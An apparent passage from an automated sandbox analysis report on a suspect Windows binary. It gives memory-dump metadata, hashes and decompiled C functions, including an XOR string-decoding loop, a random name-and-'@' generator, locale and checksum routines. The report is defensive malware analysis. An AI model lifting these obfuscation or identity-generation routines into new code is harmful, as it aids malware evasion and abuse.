                                                                    0x00421adf
                                                                    0x00421abd
                                                                    0x00421a24
                                                                    0x00421a24
                                                                    0x00421a3e
                                                                    0x00421a4a
                                                                    0x00421a4a
                                                                    0x004219d4
                                                                    0x004219d9
                                                                    0x004219f0
                                                                    0x004219fb
                                                                    0x004219fb
                                                                    0x004219d2
                                                                    0x0042192f
                                                                    0x00421851
                                                                    0x00421851
                                                                    0x00421858
                                                                    0x00421872
                                                                    0x0042187d
                                                                    0x0042185a
                                                                    0x0042185f
                                                                    0x0042186a
                                                                    0x0042186a
                                                                    0x00421858
                                                                    0x0042184f
                                                                    0x0042183b
                                                                    0x00421819
                                                                    0x004217cd
                                                                    0x0042172c
                                                                    0x00421733
                                                                    0x0042173f
                                                                    0x0042174b
                                                                    0x00421753
                                                                    0x0042175b
                                                                    0x00421769
                                                                    0x00421769
                                                                    0x004216e5
                                                                    0x004216ec
                                                                    0x004216f4
                                                                    0x00421700
                                                                    0x00421708
                                                                    0x0042170d
                                                                    0x00421716
                                                                    0x00421716
                                                                    0x004216a9
                                                                    0x004216b0
                                                                    0x004216b8
                                                                    0x004216c4
                                                                    0x004216d2
                                                                    0x004216d2
                                                                    0x0042167a
                                                                    0x0042167d
                                                                    0x00421685
                                                                    0x00421693
                                                                    0x00421693
                                                                    0x00421651
                                                                    0x00421654
                                                                    0x00421662
                                                                    0x00421662
                                                                    0x00421630
                                                                    0x00421636
                                                                    0x00421636

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 6b6cfe88163528f6187fa3ccd62bf366122736e53a67a1e7edd39ea669947c91
                                                                    • Instruction ID: 65e99b6c25c23175ca9d55d49d3855d74826325da694f5e4a8e698cf72e76d73
                                                                    • Opcode Fuzzy Hash: 6b6cfe88163528f6187fa3ccd62bf366122736e53a67a1e7edd39ea669947c91
                                                                    • Instruction Fuzzy Hash: E5E10F702043546BD710DF26DC81FAB77E8EFD6314F00851EF9809B291D6BAE949C7AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004122F0() {
                                                                    				char _v260;
                                                                    				char _v272;
                                                                    				char _v283;
                                                                    				char _v285;
                                                                    				char _v287;
                                                                    				struct _SYSTEMTIME _v288;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v297;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v316;
                                                                    				char _v320;
                                                                    				void* _t30;
                                                                    				signed int _t39;
                                                                    				void* _t51;
                                                                    
                                                                    				_t51 =  &_v300;
                                                                    				_v300 = 0xf5;
                                                                    				_v293 = 0xf5;
                                                                    				_t38 = _v288.wHour;
                                                                    				_v298 = 0x99;
                                                                    				_v295 = 0x99;
                                                                    				_t39 = _v288.wHour + (0x00000003 - _t38 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v299 = 0x87;
                                                                    				_v297 = 0x9e;
                                                                    				_v296 = 0x94;
                                                                    				_v294 = 0x82;
                                                                    				_v292 = 0x8c;
                                                                    				_v291 = 0xa3;
                                                                    				_v290 = 0xb5;
                                                                    				_v289 = 0xa2;
                                                                    				_v288.wYear = 0xa6;
                                                                    				_v287 = 0xfe;
                                                                    				_v288.wMonth = 0xb4;
                                                                    				_v285 = 0xb1;
                                                                    				_v288.wDayOfWeek = 0xa4;
                                                                    				_v283 = 0xd0;
                                                                    				_t30 = 0;
                                                                    				do {
                                                                    					if(_t39 >= 0x77) {
                                                                    						_t39 = _t39 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t39 = _t39 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t51 + _t30) =  *(_t51 + _t30) ^ 0x000000d0;
                                                                    					_t30 = _t30 + 1;
                                                                    				} while (_t30 < 0x12);
                                                                    				E0041BA80( &_v300,  &_v260, 0x104);
                                                                    				GetLocalTime( &_v288);
                                                                    				_t49 = E0041B2D0( &_v272, 0x40000000, 0, 0, 2, 0, 0);
                                                                    				E0041B470(_t34,  &_v316, 0x10,  &_v320, 0);
                                                                    				return E0041A8E0(_t49);
                                                                    			}


























                                                                    0x004122f0
                                                                    0x004122fa
                                                                    0x004122fd
                                                                    0x00412301
                                                                    0x00412305
                                                                    0x00412309
                                                                    0x00412323
                                                                    0x00412325
                                                                    0x0041232a
                                                                    0x0041232f
                                                                    0x00412334
                                                                    0x00412339
                                                                    0x0041233e
                                                                    0x00412343
                                                                    0x00412348
                                                                    0x0041234d
                                                                    0x00412352
                                                                    0x00412357
                                                                    0x0041235c
                                                                    0x00412361
                                                                    0x00412366
                                                                    0x0041236b
                                                                    0x00412370
                                                                    0x00412373
                                                                    0x0041237a
                                                                    0x00412375
                                                                    0x00412375
                                                                    0x00412375
                                                                    0x0041237d
                                                                    0x00412381
                                                                    0x00412382
                                                                    0x00412397
                                                                    0x004123a1
                                                                    0x004123cd
                                                                    0x004123d1
                                                                    0x004123e3

                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?,?,?,00000104), ref: 004123A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID:
                                                                    • API String ID: 481472006-0
                                                                    • Opcode ID: 93b0d7162686d5c5c3a234b464a1e786ebd49cf9876f23780c13d8096be158b1
                                                                    • Instruction ID: f32222099cf46a0451d7a9103964138805530692c135ca38ad99745bf4d1153d
                                                                    • Opcode Fuzzy Hash: 93b0d7162686d5c5c3a234b464a1e786ebd49cf9876f23780c13d8096be158b1
                                                                    • Instruction Fuzzy Hash: 8221AD2100C3C2AAC321D6388C45B9FBF945BA7220F48CB4DF1F58A2E2D7649105C7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004298A2(int _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v10;
                                                                    				char _v16;
                                                                    				intOrPtr _t7;
                                                                    				signed int _t9;
                                                                    				signed int _t11;
                                                                    
                                                                    				_t7 =  *0x446f24; // 0x82246c35
                                                                    				_v8 = _t7;
                                                                    				_v10 = 0;
                                                                    				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
                                                                    				if(_t9 != 0) {
                                                                    					_t11 = E00422B9E( &_v16);
                                                                    				} else {
                                                                    					_t11 = _t9 | 0xffffffff;
                                                                    				}
                                                                    				return E00428381(_t11, _v8);
                                                                    			}









                                                                    0x004298a8
                                                                    0x004298af
                                                                    0x004298be
                                                                    0x004298c2
                                                                    0x004298ca
                                                                    0x004298d5
                                                                    0x004298cc
                                                                    0x004298cc
                                                                    0x004298cc
                                                                    0x004298e4

                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 004298C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: fbd18f72d712cc5242c86705b2befc8c5ee18fc599774011a0fd8f446f3c570f
                                                                    • Instruction ID: 8a19b373abc56d4f4bcb5604fd737bbff5e85edcd549f48c5c43871521ee674e
                                                                    • Opcode Fuzzy Hash: fbd18f72d712cc5242c86705b2befc8c5ee18fc599774011a0fd8f446f3c570f
                                                                    • Instruction Fuzzy Hash: BCE09234A04218BBDB00EBB4E902A9D7BB8AB09318F44416AE511E61C1DAB59A048B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E00410680(signed int __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v4;
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v76;
                                                                    				intOrPtr _v80;
                                                                    				char _v84;
                                                                    				char _v100;
                                                                    				char _v104;
                                                                    				intOrPtr _v108;
                                                                    				char _v112;
                                                                    				char _v124;
                                                                    				char _v128;
                                                                    				char _v132;
                                                                    				char _v144;
                                                                    				char _v152;
                                                                    				signed int _t78;
                                                                    				signed int _t80;
                                                                    				signed int _t84;
                                                                    				signed int _t87;
                                                                    				intOrPtr* _t100;
                                                                    				intOrPtr _t109;
                                                                    				char* _t124;
                                                                    				intOrPtr _t132;
                                                                    				void* _t170;
                                                                    				void* _t178;
                                                                    				intOrPtr _t184;
                                                                    				void* _t185;
                                                                    				void* _t186;
                                                                    
                                                                    				_t183 = __ebp;
                                                                    				_t178 = __edi;
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FC83);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t184;
                                                                    				_t185 = _t184 - 0x78;
                                                                    				_v108 = 0xf;
                                                                    				_v112 = 0;
                                                                    				_v128 = 0;
                                                                    				_v4 = 0;
                                                                    				_t78 = E0040D1C0(__edx);
                                                                    				_t147 = _t78 % 0x64;
                                                                    				if(_t78 % 0x64 > 0x46) {
                                                                    					_t80 = E0040D1C0(_t147);
                                                                    					_t149 = _t80 % 0x64;
                                                                    					_push(0xffffffff);
                                                                    					_t124 =  &_v132;
                                                                    					_push(0);
                                                                    					if(_t80 % 0x64 < 0x32) {
                                                                    						_push(_a12);
                                                                    					} else {
                                                                    						_t149 = _a8;
                                                                    						_push(_a8);
                                                                    					}
                                                                    					E00402720(_t124);
                                                                    					_t84 = E0040D1C0(_t149);
                                                                    					_t151 = _t84 % 0x64;
                                                                    					if(_t84 % 0x64 >= 0x32) {
                                                                    						E0040D320( &_v132, _t183, "_", 1);
                                                                    					}
                                                                    					E0041E5F0();
                                                                    					_t87 = E0040D1C0(_t151);
                                                                    					_t153 = _t87 % 0x64;
                                                                    					if(_t87 % 0x64 < 0x32) {
                                                                    						 *0x44aec8( &_v76, "%c%c%c%c%c", E0040D1C0(E0040D1C0(E0040D1C0(E0040D1C0(E0040D1C0(_t153) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61, E0040D1C0(E0040D1C0(E0040D1C0(E0040D1C0(_t153) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61, E0040D1C0(E0040D1C0(E0040D1C0(_t153) % 0x1a + 0x61) % 0x1a + 0x61) % 0x1a + 0x61, E0040D1C0(E0040D1C0(_t153) % 0x1a + 0x61) % 0x1a + 0x61, E0040D1C0(_t153) % 0x1a + 0x61);
                                                                    						_t185 = _t185 + 0x1c;
                                                                    					} else {
                                                                    						 *0x44aec8( &_v76, "%d", E0040D1C0(_t153) % 0x38 + 0x79e);
                                                                    						_t185 = _t185 + 0xc;
                                                                    					}
                                                                    					_t100 =  &_v76;
                                                                    					_t170 = _t100 + 1;
                                                                    					do {
                                                                    						_t132 =  *_t100;
                                                                    						_t100 = _t100 + 1;
                                                                    					} while (_t132 != 0);
                                                                    					E0040D320( &_v132, _t183,  &_v76, _t100 - _t170);
                                                                    				} else {
                                                                    					E00402720( &_v132, _a8, 0, 0xffffffff);
                                                                    					E0040D320( &_v144, __ebp, 0x4301e0, 1);
                                                                    					E0040D230( &_v152, __ebp, _v8, 0, 0xffffffff);
                                                                    				}
                                                                    				_v80 = 0xf;
                                                                    				_v84 = 0;
                                                                    				_v100 = 0;
                                                                    				_push(_a16);
                                                                    				_push( &_v104);
                                                                    				_v4 = 1;
                                                                    				E0040F990(_t178);
                                                                    				_t180 = _a4;
                                                                    				_t186 = _t185 + 8;
                                                                    				E00402720(_a4,  &_v132, 0, 0xffffffff);
                                                                    				E0040D320(_a4, _t183, "@", 1);
                                                                    				E0040D230(_t180, _t183,  &_v124, 0, 0xffffffff);
                                                                    				_t109 = _v112;
                                                                    				if(_t109 >= 0x10) {
                                                                    					_push(_v100);
                                                                    					_t109 = L00421F9D();
                                                                    					_t186 = _t186 + 4;
                                                                    				}
                                                                    				_v84 = 0;
                                                                    				_v100 = 0;
                                                                    				_v80 = 0xf;
                                                                    				if(_v108 >= 0x10) {
                                                                    					_push(_v128);
                                                                    					_t109 = L00421F9D();
                                                                    					_t186 = _t186 + 4;
                                                                    				}
                                                                    				 *[fs:0x0] = _v12;
                                                                    				return _t109;
                                                                    			}































                                                                    0x00410680
                                                                    0x00410680
                                                                    0x00410680
                                                                    0x00410682
                                                                    0x0041068d
                                                                    0x0041068e
                                                                    0x00410695
                                                                    0x0041069c
                                                                    0x004106a4
                                                                    0x004106a8
                                                                    0x004106ac
                                                                    0x004106b3
                                                                    0x004106bf
                                                                    0x004106c4
                                                                    0x00410703
                                                                    0x0041070f
                                                                    0x00410711
                                                                    0x00410713
                                                                    0x00410717
                                                                    0x0041071b
                                                                    0x0041072e
                                                                    0x0041071d
                                                                    0x0041071d
                                                                    0x00410724
                                                                    0x00410724
                                                                    0x0041072f
                                                                    0x00410734
                                                                    0x00410740
                                                                    0x00410745
                                                                    0x00410752
                                                                    0x00410752
                                                                    0x00410757
                                                                    0x0041075c
                                                                    0x00410768
                                                                    0x0041076d
                                                                    0x004107fd
                                                                    0x00410803
                                                                    0x0041076f
                                                                    0x0041078e
                                                                    0x00410794
                                                                    0x00410794
                                                                    0x00410806
                                                                    0x0041080a
                                                                    0x00410810
                                                                    0x00410810
                                                                    0x00410812
                                                                    0x00410813
                                                                    0x00410823
                                                                    0x004106c6
                                                                    0x004106d5
                                                                    0x004106e5
                                                                    0x004106f9
                                                                    0x004106f9
                                                                    0x00410828
                                                                    0x00410830
                                                                    0x00410834
                                                                    0x0041083f
                                                                    0x00410844
                                                                    0x00410845
                                                                    0x0041084d
                                                                    0x00410852
                                                                    0x00410859
                                                                    0x00410866
                                                                    0x00410874
                                                                    0x00410883
                                                                    0x00410888
                                                                    0x00410893
                                                                    0x00410899
                                                                    0x0041089a
                                                                    0x0041089f
                                                                    0x0041089f
                                                                    0x004108a7
                                                                    0x004108ab
                                                                    0x004108af
                                                                    0x004108b8
                                                                    0x004108be
                                                                    0x004108bf
                                                                    0x004108c4
                                                                    0x004108c4
                                                                    0x004108cb
                                                                    0x004108d8

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID: %c%c%c%c%c
                                                                    • API String ID: 536389180-1277064353
                                                                    • Opcode ID: 8e0b9bdc85cae2de192c5a9ed558b04bca02f579b0b07557327a9fae9ee53357
                                                                    • Instruction ID: 52e65e23ae47a3c696c93b0dd7fb0814b18e0048383894465dcb8973240edec6
                                                                    • Opcode Fuzzy Hash: 8e0b9bdc85cae2de192c5a9ed558b04bca02f579b0b07557327a9fae9ee53357
                                                                    • Instruction Fuzzy Hash: 74511671A183009BD308EB65CD82B9FB396ABC8714F14CA3FF159662C1DA7C9448875A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E0042C39F(signed int __eax, signed char __ecx, unsigned int _a4) {
                                                                    				signed int _v6;
                                                                    				signed int _v8;
                                                                    				unsigned int _v12;
                                                                    				signed int _t118;
                                                                    				signed int _t121;
                                                                    				signed int _t123;
                                                                    				signed int _t130;
                                                                    				signed int _t137;
                                                                    				signed int _t144;
                                                                    				signed char _t184;
                                                                    				signed int _t203;
                                                                    				signed int _t210;
                                                                    				signed int _t217;
                                                                    				signed int _t224;
                                                                    				void* _t228;
                                                                    				signed int* _t231;
                                                                    				signed int* _t233;
                                                                    				signed int* _t234;
                                                                    				signed int* _t235;
                                                                    				signed int* _t236;
                                                                    				signed int* _t237;
                                                                    				signed int* _t238;
                                                                    				signed int* _t239;
                                                                    
                                                                    				_t184 = __ecx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t118 =  !__eax;
                                                                    				if(_a4 != 0) {
                                                                    					while((_t184 & 0x00000003) != 0) {
                                                                    						_t118 = _t118 >> 0x00000008 ^  *(0x448ec8 + ((0 ^ _t118) & 0x000000ff) * 4);
                                                                    						_t184 = _t184 + 1;
                                                                    						_t6 =  &_a4;
                                                                    						 *_t6 = _a4 - 1;
                                                                    						if( *_t6 != 0) {
                                                                    							continue;
                                                                    						}
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				L3:
                                                                    				_t231 = _t184;
                                                                    				_t228 = 4;
                                                                    				if(_a4 >= 0x20) {
                                                                    					_v12 = _a4 >> 5;
                                                                    					do {
                                                                    						_t123 = _t118 ^  *_t231;
                                                                    						_t233 = _t231 + _t228;
                                                                    						_v8 = _t123;
                                                                    						_t203 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t123 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t123 >> 0x18) * 4) ^  *(0x449ac8 + (_t123 & 0x000000ff) * 4) ^  *_t233;
                                                                    						_t234 = _t233 + _t228;
                                                                    						_v8 = _t203;
                                                                    						_t130 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t203 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t203 >> 0x18) * 4) ^  *(0x449ac8 + (_t203 & 0x000000ff) * 4) ^  *_t234;
                                                                    						_t235 = _t234 + _t228;
                                                                    						_v8 = _t130;
                                                                    						_t210 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t130 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t130 >> 0x18) * 4) ^  *(0x449ac8 + (_t130 & 0x000000ff) * 4) ^  *_t235;
                                                                    						_t236 = _t235 + _t228;
                                                                    						_v8 = _t210;
                                                                    						_t137 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t210 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t210 >> 0x18) * 4) ^  *(0x449ac8 + (_t210 & 0x000000ff) * 4) ^  *_t236;
                                                                    						_t237 = _t236 + _t228;
                                                                    						_v8 = _t137;
                                                                    						_t217 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t137 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t137 >> 0x18) * 4) ^  *(0x449ac8 + (_t137 & 0x000000ff) * 4) ^  *_t237;
                                                                    						_t238 = _t237 + _t228;
                                                                    						_v8 = _t217;
                                                                    						_t144 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t217 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t217 >> 0x18) * 4) ^  *(0x449ac8 + (_t217 & 0x000000ff) * 4) ^  *_t238;
                                                                    						_t239 = _t238 + _t228;
                                                                    						_v8 = _t144;
                                                                    						_a4 = _a4 - 0x20;
                                                                    						_t224 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t144 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t144 >> 0x18) * 4) ^  *(0x449ac8 + (_t144 & 0x000000ff) * 4) ^  *_t239;
                                                                    						_t231 = _t239 + _t228;
                                                                    						_v8 = _t224;
                                                                    						_t118 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t224 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t224 >> 0x18) * 4) ^  *(0x449ac8 + (_t224 & 0x000000ff) * 4);
                                                                    						_t93 =  &_v12;
                                                                    						 *_t93 = _v12 - 1;
                                                                    					} while ( *_t93 != 0);
                                                                    				}
                                                                    				if(_a4 >= _t228) {
                                                                    					_v12 = _a4 >> 2;
                                                                    					do {
                                                                    						_t121 = _t118 ^  *_t231;
                                                                    						_a4 = _a4 - _t228;
                                                                    						_v8 = _t121;
                                                                    						_t231 = _t231 + _t228;
                                                                    						_t110 =  &_v12;
                                                                    						 *_t110 = _v12 - 1;
                                                                    						_t118 =  *(0x4492c8 + (_v6 & 0x000000ff) * 4) ^  *(0x4496c8 + (_t121 & 0x000000ff) * 4) ^  *(0x448ec8 + (_t121 >> 0x18) * 4) ^  *(0x449ac8 + (_t121 & 0x000000ff) * 4);
                                                                    					} while ( *_t110 != 0);
                                                                    				}
                                                                    				if(_a4 != 0) {
                                                                    					do {
                                                                    						_t118 = _t118 >> 0x00000008 ^  *(0x448ec8 + ((0 ^ _t118) & 0x000000ff) * 4);
                                                                    						_t231 =  &(_t231[0]);
                                                                    						_t115 =  &_a4;
                                                                    						 *_t115 = _a4 - 1;
                                                                    					} while ( *_t115 != 0);
                                                                    				}
                                                                    				return  !_t118;
                                                                    			}


























                                                                    0x0042c39f
                                                                    0x0042c3a2
                                                                    0x0042c3a3
                                                                    0x0042c3ab
                                                                    0x0042c3b2
                                                                    0x0042c3b4
                                                                    0x0042c3c4
                                                                    0x0042c3cb
                                                                    0x0042c3cc
                                                                    0x0042c3cc
                                                                    0x0042c3cf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042c3cf
                                                                    0x0042c3b4
                                                                    0x0042c3d1
                                                                    0x0042c3d7
                                                                    0x0042c3d9
                                                                    0x0042c3da
                                                                    0x0042c3e6
                                                                    0x0042c3e9
                                                                    0x0042c3e9
                                                                    0x0042c3eb
                                                                    0x0042c3ed
                                                                    0x0042c41a
                                                                    0x0042c41c
                                                                    0x0042c41e
                                                                    0x0042c44b
                                                                    0x0042c44d
                                                                    0x0042c44f
                                                                    0x0042c47c
                                                                    0x0042c47e
                                                                    0x0042c480
                                                                    0x0042c4ad
                                                                    0x0042c4af
                                                                    0x0042c4b1
                                                                    0x0042c4de
                                                                    0x0042c4e0
                                                                    0x0042c4e2
                                                                    0x0042c50f
                                                                    0x0042c511
                                                                    0x0042c513
                                                                    0x0042c537
                                                                    0x0042c544
                                                                    0x0042c546
                                                                    0x0042c548
                                                                    0x0042c56e
                                                                    0x0042c575
                                                                    0x0042c575
                                                                    0x0042c575
                                                                    0x0042c3e9
                                                                    0x0042c581
                                                                    0x0042c589
                                                                    0x0042c58c
                                                                    0x0042c58c
                                                                    0x0042c58e
                                                                    0x0042c591
                                                                    0x0042c5be
                                                                    0x0042c5c0
                                                                    0x0042c5c0
                                                                    0x0042c5c3
                                                                    0x0042c5c3
                                                                    0x0042c58c
                                                                    0x0042c5cb
                                                                    0x0042c5cd
                                                                    0x0042c5d8
                                                                    0x0042c5df
                                                                    0x0042c5e0
                                                                    0x0042c5e0
                                                                    0x0042c5e0
                                                                    0x0042c5cd
                                                                    0x0042c5eb

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 5e55e03052ee71c7fe30f740d4aebb827c9d9059e5318a045460e28213cd3a8c
                                                                    • Instruction ID: 71f50b3ea90ffd9c84f59701900a1162117de156d42861d3bc29db6142c4e611
                                                                    • Opcode Fuzzy Hash: 5e55e03052ee71c7fe30f740d4aebb827c9d9059e5318a045460e28213cd3a8c
                                                                    • Instruction Fuzzy Hash: 6F71B4399101A09BDB18CFADFCE14AF77F0EB4A301B19457FE94297260C678DA21EB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E004188E0(intOrPtr __ecx, void* __eflags) {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				void* _t210;
                                                                    				void* _t213;
                                                                    				intOrPtr _t222;
                                                                    				intOrPtr _t226;
                                                                    				intOrPtr _t231;
                                                                    				intOrPtr _t234;
                                                                    				signed int _t239;
                                                                    				intOrPtr _t255;
                                                                    				intOrPtr _t256;
                                                                    				intOrPtr* _t259;
                                                                    				intOrPtr _t263;
                                                                    				signed int _t264;
                                                                    				signed int _t265;
                                                                    				void* _t268;
                                                                    				signed int _t270;
                                                                    				signed int _t302;
                                                                    				signed char _t331;
                                                                    				signed int _t332;
                                                                    				intOrPtr* _t350;
                                                                    				signed int _t351;
                                                                    				signed int _t352;
                                                                    				intOrPtr* _t371;
                                                                    				intOrPtr* _t372;
                                                                    				intOrPtr* _t373;
                                                                    				intOrPtr _t385;
